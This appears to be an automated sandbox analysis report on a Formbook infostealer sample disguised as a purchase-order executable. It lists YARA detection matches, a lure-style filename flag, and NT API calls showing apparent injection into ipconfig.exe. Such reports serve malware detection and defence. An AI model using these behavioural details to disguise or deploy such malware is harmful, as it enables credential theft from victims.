          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Purchase Order 40,7045$.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase Order 40,7045$.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417BA0 NtCreateFile,1_2_00417BA0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417C50 NtReadFile,1_2_00417C50
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417CD0 NtClose,1_2_00417CD0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417D80 NtAllocateVirtualMemory,1_2_00417D80
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417C4C NtReadFile,1_2_00417C4C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00417CCA NtClose,1_2_00417CCA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00FC98F0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00FC9860
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk,1_2_00FC9840
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk,1_2_00FC99A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00FC9910
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk,1_2_00FC9A50
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk,1_2_00FC9A20
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00FC9A00
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC95D0 NtClose,LdrInitializeThunk,1_2_00FC95D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk,1_2_00FC9540
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00FC96E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00FC9660
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00FC9FE0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00FC97A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00FC9780
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00FC9710
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC98A0 NtWriteVirtualMemory,1_2_00FC98A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCB040 NtSuspendThread,1_2_00FCB040
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9820 NtEnumerateKey,1_2_00FC9820
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC99D0 NtCreateProcessEx,1_2_00FC99D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9950 NtQueueApcThread,1_2_00FC9950
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A80 NtOpenDirectoryObject,1_2_00FC9A80
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9A10 NtQuerySection,1_2_00FC9A10
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA3B0 NtGetContextThread,1_2_00FCA3B0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9B00 NtSetValueKey,1_2_00FC9B00
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC95F0 NtQueryInformationFile,1_2_00FC95F0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9560 NtWriteFile,1_2_00FC9560
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCAD30 NtSetContextThread,1_2_00FCAD30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9520 NtWaitForSingleObject,1_2_00FC9520
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC96D0 NtCreateKey,1_2_00FC96D0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9670 NtQueryInformationProcess,1_2_00FC9670
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9650 NtQueryValueKey,1_2_00FC9650
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9610 NtEnumerateValueKey,1_2_00FC9610
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9770 NtSetInformationFile,1_2_00FC9770
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA770 NtOpenThread,1_2_00FCA770
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9760 NtOpenProcess,1_2_00FC9760
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9730 NtQueryVirtualMemory,1_2_00FC9730
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA710 NtOpenProcessToken,1_2_00FCA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk,5_2_02EB9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_02EB9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk,5_2_02EB9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk,5_2_02EB99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_02EB9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02EB96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk,5_2_02EB96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk,5_2_02EB9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk,5_2_02EB9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk,5_2_02EB9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95D0 NtClose,LdrInitializeThunk,5_2_02EB95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk,5_2_02EB9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A80 NtOpenDirectoryObject,5_2_02EB9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A20 NtResumeThread,5_2_02EB9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A00 NtProtectVirtualMemory,5_2_02EB9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9A10 NtQuerySection,5_2_02EB9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA3B0 NtGetContextThread,5_2_02EBA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9B00 NtSetValueKey,5_2_02EB9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98F0 NtReadVirtualMemory,5_2_02EB98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB98A0 NtWriteVirtualMemory,5_2_02EB98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBB040 NtSuspendThread,5_2_02EBB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9820 NtEnumerateKey,5_2_02EB9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB99D0 NtCreateProcessEx,5_2_02EB99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9950 NtQueueApcThread,5_2_02EB9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9660 NtAllocateVirtualMemory,5_2_02EB9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9670 NtQueryInformationProcess,5_2_02EB9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9650 NtQueryValueKey,5_2_02EB9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9610 NtEnumerateValueKey,5_2_02EB9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB97A0 NtUnmapViewOfSection,5_2_02EB97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9760 NtOpenProcess,5_2_02EB9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA770 NtOpenThread,5_2_02EBA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9770 NtSetInformationFile,5_2_02EB9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9730 NtQueryVirtualMemory,5_2_02EB9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBA710 NtOpenProcessToken,5_2_02EBA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB95F0 NtQueryInformationFile,5_2_02EB95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9560 NtWriteFile,5_2_02EB9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB9520 NtWaitForSingleObject,5_2_02EB9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EBAD30 NtSetContextThread,5_2_02EBAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17BA0 NtCreateFile,5_2_02B17BA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CD0 NtClose,5_2_02B17CD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C50 NtReadFile,5_2_02B17C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17CCA NtClose,5_2_02B17CCA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B17C4C NtReadFile,5_2_02B17C4C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E99690_2_013E9969
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E91F90_2_013E91F9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E8D640_2_013E8D64
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E9D510_2_013E9D51
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E95970_2_013E9597
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E07F60_2_013E07F6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041C16E1_2_0041C16E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00408A401_2_00408A40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00408A3B1_2_00408A3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041C52F1_2_0041C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402D8A1_2_00402D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041BF031_2_0041BF03
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A01_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B0901_2_00F9B090
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA8301_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010410021_2_01041002
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105E8241_2_0105E824
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010520A81_2_010520A8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA41201_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010528EC1_2_010528EC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8F9001_2_00F8F900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052B281_2_01052B28
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104DBD21_2_0104DBD2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010403DA1_2_010403DA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FA2B1_2_0103FA2B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBEBB01_2_00FBEBB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010522AE1_2_010522AE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAB401_2_00FAAB40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052D071_2_01052D07
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051D551_2_01051D55
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010525DD1_2_010525DD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9841F1_2_00F9841F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E01_2_00F9D5E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104D4661_2_0104D466
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB25811_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F80D201_2_00F80D20
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA6E301_2_00FA6E30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105DFCE1_2_0105DFCE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051FF11_2_01051FF1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104D6161_2_0104D616
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052EF71_2_01052EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F422AE5_2_02F422AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FA2B5_2_02F2FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3DBD25_2_02F3DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F303DA5_2_02F303DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAEBB05_2_02EAEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AB405_2_02E9AB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42B285_2_02F42B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F428EC5_2_02F428EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A05_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F420A85_2_02F420A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B0905_2_02E8B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4E8245_2_02F4E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F310025_2_02F31002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E941205_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7F9005_2_02E7F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42EF75_2_02F42EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E96E305_2_02E96E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3D6165_2_02F3D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41FF15_2_02F41FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4DFCE5_2_02F4DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3D4665_2_02F3D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8841F5_2_02E8841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8D5E05_2_02E8D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F425DD5_2_02F425DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA25815_2_02EA2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41D555_2_02F41D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E70D205_2_02E70D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42D075_2_02F42D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B08A3B5_2_02B08A3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B08A405_2_02B08A40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1C16E5_2_02B1C16E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02FB05_2_02B02FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1BF035_2_02B1BF03
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02D905_2_02B02D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02D8A5_2_02B02D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1C52F5_2_02B1C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 013E0550 appears 47 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 013EDBFD appears 32 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 013DB9F5 appears 624 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: String function: 00F8B150 appears 54 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02E7B150 appears 48 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@17/13
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: Purchase Order 40,7045$.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
